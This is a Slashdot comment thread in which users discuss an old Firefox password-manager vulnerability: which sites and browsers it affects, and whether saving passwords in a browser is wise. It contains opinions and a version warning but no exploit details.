After reading TFA and the bugzilla report it sounds like this bug does not allow ANY password stored in the password manager to be stolen as some people seem to be assuming. It sounds like only passwords for sites that allows user generated HTML to contain input fields are at risk.

If it affects Firefox and Internet Explorer... (2, Interesting)

ewl1217 (922107) | more than 7 years ago | (#16942362)

Does anyone know if Konqueror (using KDE Wallet) is affected? And what about other browsers, like Opera, Epiphany, and so on? I'd just like to know how common this type of exploit is.

software level bug (1)

HAL9000_mirror (1029222) | more than 7 years ago | (#16942576)

While I agree FF should alert the user, this is not a hole in FF's security architecture. Its rather a software level bug. Moral of the story: 1. don't be lazy and ask your browser to remember your password. 2. if you insist to be lazy, store passwords only for trivial web accounts.

My 2 cents (0)

Inferger (1007151) | more than 7 years ago | (#16942598)

I never have Firefox nor any browser for that matter keep passwords to information that might comprimise my identity. Unless identity thieves want to play sockpuppet with a forum account I don't think theres anything of interest. If people used common sense and not remember extremely important passwords like the one for your PayPal account you would never hear of this kind of problem being a problem.

WARNING (3, Informative)

tezbobobo (879983) | more than 7 years ago | (#16942732)

DEERPARK 1.5.0.4 is also vulnerable - based on firefox 1.5
Load More Comments
Slashdot Login

Need an Account?

Forgot your password?

Submission Text Formatting Tips

We support a small subset of HTML, namely these tags:

  • b
  • i
  • p
  • br
  • a
  • ol
  • ul
  • li
  • dl
  • dt
  • dd
  • em
  • strong
  • tt
  • blockquote
  • div
  • quote
  • ecode

"ecode" can be used for code snippets, for example:

<ecode>    while(1) { do_something(); } </ecode>